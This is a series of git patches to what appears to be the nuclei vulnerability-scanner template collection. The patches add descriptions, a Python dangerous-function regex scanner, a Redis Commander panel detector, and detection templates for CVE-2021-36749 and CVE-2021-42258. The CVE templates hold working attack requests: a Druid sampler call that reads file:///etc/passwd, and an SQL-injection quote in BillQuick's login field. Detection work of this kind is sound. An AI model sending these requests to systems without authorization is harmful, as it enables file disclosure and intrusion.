From a96bfc3992fe58b899aa8a7ade68b30931b1ef1c Mon Sep 17 00:00:00 2001 From: Noam Rathaus Date: Mon, 25 Oct 2021 12:52:58 +0300 Subject: [PATCH 01/23] Add description --- vulnerabilities/wordpress/weekender-newspaper-open-redirect.yaml | 1 + vulnerabilities/wordpress/wordpress-accessible-wpconfig.yaml | 1 + 2 files changed, 2 insertions(+) diff --git a/vulnerabilities/wordpress/weekender-newspaper-open-redirect.yaml b/vulnerabilities/wordpress/weekender-newspaper-open-redirect.yaml index 64d1b30634..c7641f841a 100644 --- a/vulnerabilities/wordpress/weekender-newspaper-open-redirect.yaml +++ b/vulnerabilities/wordpress/weekender-newspaper-open-redirect.yaml @@ -4,6 +4,7 @@ info: name: WordPress Weekender Newspaper Themes 9.0 - Open Redirection author: 0x_Akoko severity: low + description: The WordPress Weekender Newspaper Themes allows remote attackers to redirect users to an attacker controlled URL. reference: https://cxsecurity.com/issue/WLB-2020040103 tags: wordpress,wp-plugin,redirect diff --git a/vulnerabilities/wordpress/wordpress-accessible-wpconfig.yaml b/vulnerabilities/wordpress/wordpress-accessible-wpconfig.yaml index 683cf92dc3..226a87797b 100644 --- a/vulnerabilities/wordpress/wordpress-accessible-wpconfig.yaml +++ b/vulnerabilities/wordpress/wordpress-accessible-wpconfig.yaml @@ -3,6 +3,7 @@ info: name: WordPress accessible wp-config author: Kiblyn11,zomsop82,madrobot,geeknik,daffainfo,r12w4n severity: high + description: The remote WordPress installation has the `wp-config` file remotely accessible and its content available for reading. tags: wordpress,backup requests: From 6a6ba60aade8f70f1cb9a3e205cff190d340b6e2 Mon Sep 17 00:00:00 2001 From: Noam Rathaus Date: Mon, 25 Oct 2021 12:53:22 +0300 Subject: [PATCH 02/23] Description --- vulnerabilities/wordpress/eatery-restaurant-open-redirect.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/vulnerabilities/wordpress/eatery-restaurant-open-redirect.yaml b/vulnerabilities/wordpress/eatery-restaurant-open-redirect.yaml index d649437101..4b8b194cfc 100644 --- a/vulnerabilities/wordpress/eatery-restaurant-open-redirect.yaml +++ b/vulnerabilities/wordpress/eatery-restaurant-open-redirect.yaml @@ -4,6 +4,7 @@ info: name: WordPress Attitude Themes 1.1.1 Open Redirection author: 0x_Akoko severity: low + description: The WordPress Attitude Themes allows remote attackers to redirect users to an attacker controlled URL. reference: https://cxsecurity.com/issue/WLB-2020030183 tags: wordpress,wp-theme,redirect From c9e9c04f37856d253f422325be2d7e8bd6dd8902 Mon Sep 17 00:00:00 2001 From: Noam Rathaus Date: Mon, 25 Oct 2021 12:54:00 +0300 Subject: [PATCH 03/23] Add description --- vulnerabilities/wordpress/easy-wp-smtp-listing.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/vulnerabilities/wordpress/easy-wp-smtp-listing.yaml b/vulnerabilities/wordpress/easy-wp-smtp-listing.yaml index 1c669ac324..6225458a19 100644 --- a/vulnerabilities/wordpress/easy-wp-smtp-listing.yaml +++ b/vulnerabilities/wordpress/easy-wp-smtp-listing.yaml @@ -4,6 +4,7 @@ info: name: SMTP WP Plugin Directory listing enabled author: PR3R00T severity: high + description: The WordPress Easy WP SMTP Plugin has its 'easy-wp-smtp' folder remotely acccessible and its content available for access. reference: https://blog.nintechnet.com/wordpress-easy-wp-smtp-plugin-fixed-zero-day-vulnerability/ tags: wordpress,wp-plugin From 9f8270bb7a4857ec0754eaa59c96a3f4f6137711 Mon Sep 17 00:00:00 2001 From: Noam Rathaus Date: Mon, 25 Oct 2021 12:54:49 +0300 Subject: [PATCH 04/23] Add description --- vulnerabilities/other/webui-rce.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/vulnerabilities/other/webui-rce.yaml b/vulnerabilities/other/webui-rce.yaml index 82d1fab54a..384fe2d49f 100644 --- a/vulnerabilities/other/webui-rce.yaml +++ b/vulnerabilities/other/webui-rce.yaml @@ -3,6 +3,7 @@ info: name: WebUI 1.5b6 RCE author: pikpikcu severity: critical + description: WebUI's 'mainfile.php' endpoint contain a vulnerability that allows remote attackers to cause it to execute arbitrary code via the 'Logon' parameter. reference: https://www.exploit-db.com/exploits/36821 tags: webui,rce From 3029da4ceb8d8c288f22da073e7d6dbcd08994fb Mon Sep 17 00:00:00 2001 From: Noam Rathaus Date: Mon, 25 Oct 2021 12:55:23 +0300 Subject: [PATCH 05/23] Add description --- vulnerabilities/other/unauth-spark-api.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/vulnerabilities/other/unauth-spark-api.yaml b/vulnerabilities/other/unauth-spark-api.yaml index 8a936e9aa0..56ccbcbe76 100644 --- a/vulnerabilities/other/unauth-spark-api.yaml +++ b/vulnerabilities/other/unauth-spark-api.yaml @@ -3,6 +3,7 @@ info: name: Unauthenticated Spark REST API author: princechaddha severity: medium + description: The remote Spark product's REST API interface does not appear to prevent unauthenticated users from accesing it. reference: https://xz.aliyun.com/t/2490 tags: spark,unauth From 319c8a830e9aade672d3dbb6f33c407f806c4d83 Mon Sep 17 00:00:00 2001 From: Noam Rathaus Date: Mon, 25 Oct 2021 12:56:03 +0300 Subject: [PATCH 06/23] Add description --- vulnerabilities/other/vpms-auth-bypass.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/vulnerabilities/other/vpms-auth-bypass.yaml b/vulnerabilities/other/vpms-auth-bypass.yaml index 6f612b4f78..a59b7b3bd1 100644 --- a/vulnerabilities/other/vpms-auth-bypass.yaml +++ b/vulnerabilities/other/vpms-auth-bypass.yaml @@ -4,6 +4,7 @@ info: name: Vehicle Parking Management System 1.0 - Authentication Bypass author: dwisiswant0 severity: high + description: The Vehicle Parking Management System allows remote attackers to bypass the authentication system by utilizing an SQL injection vulnerability in the 'password' parameter. reference: https://www.exploit-db.com/exploits/48877 tags: auth-bypass requests: From f9fb28277015cba688cbfee2c47a32ad833a0b6f Mon Sep 17 00:00:00 2001 From: Noam Rathaus Date: Mon, 25 Oct 2021 12:57:40 +0300 Subject: [PATCH 07/23] Add description --- vulnerabilities/other/viewlinc-crlf-injection.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/vulnerabilities/other/viewlinc-crlf-injection.yaml b/vulnerabilities/other/viewlinc-crlf-injection.yaml index c1e677dcb7..199d945cd7 100644 --- a/vulnerabilities/other/viewlinc-crlf-injection.yaml +++ b/vulnerabilities/other/viewlinc-crlf-injection.yaml @@ -4,6 +4,7 @@ info: name: viewLinc viewLinc/5.1.2.367 (and sometimes 5.1.1.50) is vulnerable to CRLF Injection. author: geeknik severity: low + description: The viewLinc application allows remote attackers to inject a CRLF character into the responses returned by the product, this allows attackers to inject arbitrary HTTP headers into the response returned. reference: https://www.vaisala.com/en/products/systems/indoor-monitoring-systems/viewlinc-continuous-monitoring-system tags: crlf,viewlinc From e4018d4a0c54552db90609699790ef47d52f56a1 Mon Sep 17 00:00:00 2001 From: Noam Rathaus Date: Mon, 25 Oct 2021 12:58:22 +0300 Subject: [PATCH 08/23] Add description --- vulnerabilities/other/ueditor-file-upload.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/vulnerabilities/other/ueditor-file-upload.yaml b/vulnerabilities/other/ueditor-file-upload.yaml index 07225c62db..733c46e297 100644 --- a/vulnerabilities/other/ueditor-file-upload.yaml +++ b/vulnerabilities/other/ueditor-file-upload.yaml @@ -3,6 +3,7 @@ info: name: UEditor Arbitrary File Upload author: princechaddha severity: high + description: A vulnerability in UEditor allows remote unauthenticated attackers to upload arbitrary files to the server, this in turn can be used to make the application to execute their content as code. reference: - https://zhuanlan.zhihu.com/p/85265552 - https://www.freebuf.com/vuls/181814.html From 081a2546fefd906ac50420a5175a6576a93f827f Mon Sep 17 00:00:00 2001 From: Noam Rathaus Date: Mon, 25 Oct 2021 12:59:08 +0300 Subject: [PATCH 09/23] Add description --- vulnerabilities/other/wems-manager-xss.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/vulnerabilities/other/wems-manager-xss.yaml b/vulnerabilities/other/wems-manager-xss.yaml index b73ec6dc84..db201ad502 100644 --- a/vulnerabilities/other/wems-manager-xss.yaml +++ b/vulnerabilities/other/wems-manager-xss.yaml @@ -5,7 +5,7 @@ info: author: pikpikcu severity: medium tags: xss - + description: A vulnerability in WEMS Enterprise Manager allows remote attackers to inject arbitrary Javascript into the response return by the server by sending it to the '/guest/users/forgotten' endpoint and the 'email' parameter. reference: - https://packetstormsecurity.com/files/155777/WEMS-Enterprise-Manager-2.58-Cross-Site-Scripting.html From a197ec8370d00a0d9a634a28b4d75eeb62a28794 Mon Sep 17 00:00:00 2001 From: sandeep Date: Mon, 25 Oct 2021 16:03:46 +0530 Subject: [PATCH 10/23] misc formatting update --- file/python/python-scanner.yaml | 17 ++++++++++------- 1 file changed, 10 insertions(+), 7 deletions(-) diff --git a/file/python/python-scanner.yaml b/file/python/python-scanner.yaml index 6f7b8770d6..6542b33797 100644 --- a/file/python/python-scanner.yaml +++ b/file/python/python-scanner.yaml @@ -4,7 +4,7 @@ info: name: Python Scanner author: majidmc2 severity: info - description: Scan for dangerous Python functions + description: Indicators for dangerous Python functions reference: - https://www.kevinlondon.com/2015/07/26/dangerous-python-functions.html - https://www.kevinlondon.com/2015/08/15/dangerous-python-functions-pt2.html @@ -17,7 +17,8 @@ file: extractors: - type: regex - name: Possible Code Injection + name: code-injection + condition: or regex: - 'exec' - 'eval' @@ -25,7 +26,8 @@ file: - type: regex - name: Possible Command Injection + name: command-injection + condition: or regex: - 'subprocess.call\(.*shell=True.*\)' - 'os.system' @@ -33,18 +35,19 @@ file: - type: regex - name: Possibly Unpickling untrusted source + name: untrusted-source + condition: or regex: - 'pickle.loads' - 'cPickle.loads' - type: regex - name: Possibly loading dangerous YAMLs + name: dangerous-yaml regex: - 'yaml.load' - type: regex - name: Possible SQLi + name: sqli regex: - - 'cursor.execute' + - 'cursor.execute' \ No newline at end of file From 0eb9092fe2c103011761e6157188208e0b15dece Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 25 Oct 2021 10:55:07 +0000 Subject: [PATCH 11/23] Auto README Update [Mon Oct 25 10:55:07 UTC 2021] :robot: --- README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/README.md b/README.md index 47d02bb65e..46fe32d081 100644 --- a/README.md +++ b/README.md @@ -53,7 +53,7 @@ An overview of the nuclei template project, including statistics on unique tags, | wp-plugin | 178 | princechaddha | 66 | default-logins | 60 | | | | | | cve2020 | 166 | madrobot | 63 | file | 50 | | | | | -**176 directories, 2418 files**. +**177 directories, 2443 files**. From e30362f0ab493a81f6d6f787ceacc5b43e739d85 Mon Sep 17 00:00:00 2001 From: sandeep Date: Mon, 25 Oct 2021 17:08:57 +0530 Subject: [PATCH 12/23] extractors doesn't support "condition" attribute explicitly --- file/python/python-scanner.yaml | 3 --- 1 file changed, 3 deletions(-) diff --git a/file/python/python-scanner.yaml b/file/python/python-scanner.yaml index 6542b33797..c949abfae5 100644 --- a/file/python/python-scanner.yaml +++ b/file/python/python-scanner.yaml @@ -18,7 +18,6 @@ file: extractors: - type: regex name: code-injection - condition: or regex: - 'exec' - 'eval' @@ -27,7 +26,6 @@ file: - type: regex name: command-injection - condition: or regex: - 'subprocess.call\(.*shell=True.*\)' - 'os.system' @@ -36,7 +34,6 @@ file: - type: regex name: untrusted-source - condition: or regex: - 'pickle.loads' - 'cPickle.loads' From 1db2405c25e4ef807ad8d961fd585f75b0eeade3 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Mon, 25 Oct 2021 17:30:48 +0530 Subject: [PATCH 13/23] Create CVE-2021-36749.yaml --- cves/2021/CVE-2021-36749.yaml | 35 +++++++++++++++++++++++++++++++++++ 1 file changed, 35 insertions(+) create mode 100644 cves/2021/CVE-2021-36749.yaml diff --git a/cves/2021/CVE-2021-36749.yaml b/cves/2021/CVE-2021-36749.yaml new file mode 100644 index 0000000000..c0f1e3224e --- /dev/null +++ b/cves/2021/CVE-2021-36749.yaml @@ -0,0 +1,35 @@ +id: CVE-2021-36749 + +info: + name: Apache Druid Authentication Restrictions Bypass + author: _0xf4n9x_ + severity: medium + description: In the Druid ingestion system, the InputSource is used for reading data from a certain data source. However, the HTTP InputSource allows authenticated users to read data from other sources than intended, such as the local file system, with the privileges of the Druid server process. This is not an elevation of privilege when users access Druid directly, since Druid also provides the Local InputSource, which allows the same level of access. But it is problematic when users interact with Druid indirectly through an application that allows users to specify the HTTP InputSource, but not the Local InputSource. In this case, users could bypass the application-level restriction by passing a file URL to the HTTP InputSource. This issue was previously mentioned as being fixed in 0.21.0 as per CVE-2021-26920 but was not fixed in 0.21.0 or 0.21.1. + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2021-36749 + - https://www.cvedetails.com/cve/CVE-2021-36749/ + - https://github.com/BrucessKING/CVE-2021-36749 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-score: 6.5 + cve-id: CVE-2021-36749 + cwe-id: CWE-668 + tags: cve,cve2021,apache,lfi,auth-bypass + +requests: + - raw: + - | + POST /druid/indexer/v1/sampler?for=connect HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/json + + {"type":"index","spec":{"type":"index","ioConfig":{"type":"index","firehose":{"type":"http","uris":[" file:///etc/passwd "]}},"dataSchema":{"dataSource":"sample","parser":{"type":"string", "parseSpec":{"format":"regex","pattern":"(.*)","columns":["a"],"dimensionsSpec":{},"timestampSpec":{"column":"no_ such_ column","missingValue":"2010-01-01T00:00:00Z"}}}}},"samplerConfig":{"numRows":500,"timeoutMs":15000}} + + matchers-condition: and + matchers: + - type: regex + part: body + regex: + - "root:.*:0:0:" + - "druid:*:1000:1000:" + condition: or From 3c21e2fc163b4fe6dfbf2ccb5415f7fffefc7b19 Mon Sep 17 00:00:00 2001 From: Philipp Dahse Date: Mon, 25 Oct 2021 15:45:49 +0200 Subject: [PATCH 14/23] Add Redis Commander Panel Detection Redis Commander is a common ui for redis. Access to Redis Commander can allow access to redis and expose sensible session or cache data. --- exposed-panels/redis-commander-exposure.yaml | 22 ++++++++++++++++++++ 1 file changed, 22 insertions(+) create mode 100644 exposed-panels/redis-commander-exposure.yaml diff --git a/exposed-panels/redis-commander-exposure.yaml b/exposed-panels/redis-commander-exposure.yaml new file mode 100644 index 0000000000..fea8a67df6 --- /dev/null +++ b/exposed-panels/redis-commander-exposure.yaml @@ -0,0 +1,22 @@ +id: redis-commander-exposure + +info: + name: Redis Commander Exposure + author: dahse89 + severity: low + reference: + - https://joeferner.github.io/redis-commander/ + - https://github.com/joeferner/redis-commander + tags: panel + +requests: + - method: GET + path: + - '{{BaseURL}}' + + matchers: + - type: word + words: + - "Redis Commander" + - "redisCommanderBearerToken" + condition: and From bf7070dbc786b501601d8030337c328d4dc26e2e Mon Sep 17 00:00:00 2001 From: Dwi Siswanto <dwi.siswanto98@gmail.com> Date: Tue, 26 Oct 2021 15:26:22 +0700 Subject: [PATCH 15/23] Add CVE-2021-42258 --- cves/2021/CVE-2021-42258.yaml | 66 +++++++++++++++++++++++++++++++++++ 1 file changed, 66 insertions(+) create mode 100644 cves/2021/CVE-2021-42258.yaml diff --git a/cves/2021/CVE-2021-42258.yaml b/cves/2021/CVE-2021-42258.yaml new file mode 100644 index 0000000000..203f286368 --- /dev/null +++ b/cves/2021/CVE-2021-42258.yaml @@ -0,0 +1,66 @@ +id: CVE-2021-42258 + +info: + name: BillQuick Web Suite SQLi + author: dwisiswant0 + severity: high + tags: bqe,cve,cve2021,sqli + description: | + This template supports the detection part only. See references. + + BQE BillQuick Web Suite 2018 through 2021 before 22.0.9.1 + allows SQL injection for unauthenticated remote code execution, + as exploited in the wild in October 2021 for ransomware installation. + SQL injection can, for example, use the txtID (aka username) parameter. + Successful exploitation can include the ability to execute + arbitrary code as MSSQLSERVER$ via xp_cmdshell. + reference: https://www.huntress.com/blog/threat-advisory-hackers-are-exploiting-a-vulnerability-in-popular-billing-software-to-deploy-ransomware + +requests: + - raw: + - | + GET / HTTP/1.1 + Host: {{Hostname}} + + - | + POST / HTTP/1.1 + Host: {{Hostname}} + Referer: {{BaseURL}} + Origin: {{RootURL}} + Connection: close + Content-Type: application/x-www-form-urlencoded + + __EVENTTARGET=cmdOK&__EVENTARGUMENT=&__VIEWSTATE={{url_encode("§VS§")}}&__VIEWSTATEGENERATOR={{url_encode("§VSG§")}}&__EVENTVALIDATION={{url_encode("§EV§")}}&txtID=uname%27&txtPW=passwd&hdnClientDPI=96 + + cookie-reuse: true + extractors: + - type: xpath + name: VS + internal: true + attribute: value + xpath: + - "/html/body/form/div/input[@id='__VIEWSTATE']" + + - type: xpath + name: VSG + internal: true + attribute: value + xpath: + - "/html/body/form/div/input[@id='__VIEWSTATEGENERATOR']" + + - type: xpath + name: EV + internal: true + attribute: value + xpath: + - "/html/body/form/div/input[@id='__EVENTVALIDATION']" + + matchers: + - type: word + part: body + words: + - "Incorrect syntax near" + - "_ACCOUNTLOCKED" + + + From 9773130879cc402a823b2c2a91db5f878987fdfa Mon Sep 17 00:00:00 2001 From: Dwi Siswanto <dwi.siswanto98@gmail.com> Date: Tue, 26 Oct 2021 15:31:41 +0700 Subject: [PATCH 16/23] Remove blank lines --- cves/2021/CVE-2021-42258.yaml | 5 +---- 1 file changed, 1 insertion(+), 4 deletions(-) diff --git a/cves/2021/CVE-2021-42258.yaml b/cves/2021/CVE-2021-42258.yaml index 203f286368..47adea9eea 100644 --- a/cves/2021/CVE-2021-42258.yaml +++ b/cves/2021/CVE-2021-42258.yaml @@ -60,7 +60,4 @@ requests: part: body words: - "Incorrect syntax near" - - "_ACCOUNTLOCKED" - - - + - "_ACCOUNTLOCKED" \ No newline at end of file From 1986e1211d358891cc0dea5344e41b8b3130c0fa Mon Sep 17 00:00:00 2001 From: sandeep <sandeep@projectdiscovery.io> Date: Tue, 26 Oct 2021 14:25:37 +0530 Subject: [PATCH 17/23] Adding condition between word matcher --- cves/2021/CVE-2021-42258.yaml | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/cves/2021/CVE-2021-42258.yaml b/cves/2021/CVE-2021-42258.yaml index 47adea9eea..2920990570 100644 --- a/cves/2021/CVE-2021-42258.yaml +++ b/cves/2021/CVE-2021-42258.yaml @@ -27,7 +27,6 @@ requests: Host: {{Hostname}} Referer: {{BaseURL}} Origin: {{RootURL}} - Connection: close Content-Type: application/x-www-form-urlencoded __EVENTTARGET=cmdOK&__EVENTARGUMENT=&__VIEWSTATE={{url_encode("§VS§")}}&__VIEWSTATEGENERATOR={{url_encode("§VSG§")}}&__EVENTVALIDATION={{url_encode("§EV§")}}&txtID=uname%27&txtPW=passwd&hdnClientDPI=96 @@ -58,6 +57,8 @@ requests: matchers: - type: word part: body + condition: and words: + - "System.Data.SqlClient.SqlException" - "Incorrect syntax near" - - "_ACCOUNTLOCKED" \ No newline at end of file + - "_ACCOUNTLOCKED" From 2fa9791bdcab1aea46b2ffc0d84552876e2c9bee Mon Sep 17 00:00:00 2001 From: sandeep <sandeep@projectdiscovery.io> Date: Tue, 26 Oct 2021 14:32:23 +0530 Subject: [PATCH 18/23] misc update --- cves/2021/CVE-2021-42258.yaml | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/cves/2021/CVE-2021-42258.yaml b/cves/2021/CVE-2021-42258.yaml index 2920990570..64def1d504 100644 --- a/cves/2021/CVE-2021-42258.yaml +++ b/cves/2021/CVE-2021-42258.yaml @@ -4,17 +4,17 @@ info: name: BillQuick Web Suite SQLi author: dwisiswant0 severity: high - tags: bqe,cve,cve2021,sqli + tags: cve,cve2021,sqli,billquick description: | - This template supports the detection part only. See references. - BQE BillQuick Web Suite 2018 through 2021 before 22.0.9.1 allows SQL injection for unauthenticated remote code execution, as exploited in the wild in October 2021 for ransomware installation. SQL injection can, for example, use the txtID (aka username) parameter. Successful exploitation can include the ability to execute arbitrary code as MSSQLSERVER$ via xp_cmdshell. - reference: https://www.huntress.com/blog/threat-advisory-hackers-are-exploiting-a-vulnerability-in-popular-billing-software-to-deploy-ransomware + reference: + - https://www.huntress.com/blog/threat-advisory-hackers-are-exploiting-a-vulnerability-in-popular-billing-software-to-deploy-ransomware + - https://nvd.nist.gov/vuln/detail/CVE-2021-42258 requests: - raw: From 8fb9b08e61721144ad21a0baa876ed7512ab7383 Mon Sep 17 00:00:00 2001 From: sandeep <sandeep@projectdiscovery.io> Date: Tue, 26 Oct 2021 15:02:32 +0530 Subject: [PATCH 19/23] misc update --- .github/workflows/template-validate.yml | 4 +--- 1 file changed, 1 insertion(+), 3 deletions(-) diff --git a/.github/workflows/template-validate.yml b/.github/workflows/template-validate.yml index a158694063..705f870c7e 100644 --- a/.github/workflows/template-validate.yml +++ b/.github/workflows/template-validate.yml @@ -20,10 +20,8 @@ jobs: - name: Installing Nuclei # if: steps.cache-go.outputs.cache-hit != 'true' - env: - GO111MODULE: on run: | - go install github.com/projectdiscovery/nuclei/v2/cmd/nuclei@dev + go install github.com/projectdiscovery/nuclei/v2/cmd/nuclei@latest shell: bash - name: Template Validation From fb81f4ca362fa57569909200cb7445795cfba33f Mon Sep 17 00:00:00 2001 From: Noam Rathaus <noamr@beyondsecurity.com> Date: Tue, 26 Oct 2021 12:35:56 +0300 Subject: [PATCH 20/23] Better description --- vulnerabilities/wordpress/wp-upload-data.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/vulnerabilities/wordpress/wp-upload-data.yaml b/vulnerabilities/wordpress/wp-upload-data.yaml index 8539ff6058..9a474dff0a 100644 --- a/vulnerabilities/wordpress/wp-upload-data.yaml +++ b/vulnerabilities/wordpress/wp-upload-data.yaml @@ -4,7 +4,7 @@ info: name: wordpress-upload-data author: pussycat0x severity: medium - description: Searches for Passwords in the wordpress uploads directory. + description: The remote WordPress installation contains a file 'data.txt' under the '/wp-content/uploads/' folder that has sensitive information inside it. reference: https://www.exploit-db.com/ghdb/7040 tags: wordpress,listing From 9c96179595244775a99b53311e59ef80e0c193eb Mon Sep 17 00:00:00 2001 From: Noam Rathaus <noamr@beyondsecurity.com> Date: Tue, 26 Oct 2021 12:45:16 +0300 Subject: [PATCH 21/23] Fix description --- vulnerabilities/other/solar-log-authbypass.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/vulnerabilities/other/solar-log-authbypass.yaml b/vulnerabilities/other/solar-log-authbypass.yaml index 382d65e232..7e3f5cd21d 100644 --- a/vulnerabilities/other/solar-log-authbypass.yaml +++ b/vulnerabilities/other/solar-log-authbypass.yaml @@ -4,7 +4,7 @@ info: name: Solar-Log 500 2.8.2 - Incorrect Access Control author: geeknik severity: high - description: The web administration server for Solar-Log 500 all versions prior to 2.8.2 Build 52 does not require authentication, which allows arbitrary remote attackers> + description: The web administration server for Solar-Log 500 all versions prior to 2.8.2 Build 52 does not require authentication, which allows arbitrary remote attackers gain administrative privileges by connecting to the server reference: https://www.exploit-db.com/exploits/49986 tags: solarlog,auth-bypass From 058d859cd849f2047d5df2f2201b1007213bec66 Mon Sep 17 00:00:00 2001 From: Noam Rathaus <noamr@beyondsecurity.com> Date: Tue, 26 Oct 2021 12:45:23 +0300 Subject: [PATCH 22/23] Add description --- vulnerabilities/wordpress/wp-oxygen-theme-lfi.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/vulnerabilities/wordpress/wp-oxygen-theme-lfi.yaml b/vulnerabilities/wordpress/wp-oxygen-theme-lfi.yaml index 63829a085e..e4cb6515af 100644 --- a/vulnerabilities/wordpress/wp-oxygen-theme-lfi.yaml +++ b/vulnerabilities/wordpress/wp-oxygen-theme-lfi.yaml @@ -4,6 +4,7 @@ info: name: WordPress Oxygen-Theme Themes LFI author: 0x_Akoko severity: high + description: The WordPress Oxygen-Theme has a local file inclusion vulnerability in its 'download.php' and 'file' parameter. tags: wordpress,wp-theme,lfi reference: https://cxsecurity.com/issue/WLB-2019030178 From e453bfcb192a6d6fe15aea85b1b2fd38dbf5ed32 Mon Sep 17 00:00:00 2001 From: Sandeep Singh <sandeep@projectdiscovery.io> Date: Tue, 26 Oct 2021 15:17:36 +0530 Subject: [PATCH 23/23] Update redis-commander-exposure.yaml --- exposed-panels/redis-commander-exposure.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/exposed-panels/redis-commander-exposure.yaml b/exposed-panels/redis-commander-exposure.yaml index fea8a67df6..0a0ee65364 100644 --- a/exposed-panels/redis-commander-exposure.yaml +++ b/exposed-panels/redis-commander-exposure.yaml @@ -7,7 +7,7 @@ info: reference: - https://joeferner.github.io/redis-commander/ - https://github.com/joeferner/redis-commander - tags: panel + tags: panel,redis requests: - method: GET @@ -16,7 +16,7 @@ requests: matchers: - type: word + condition: and words: - "<title>Redis Commander" - "redisCommanderBearerToken" - condition: and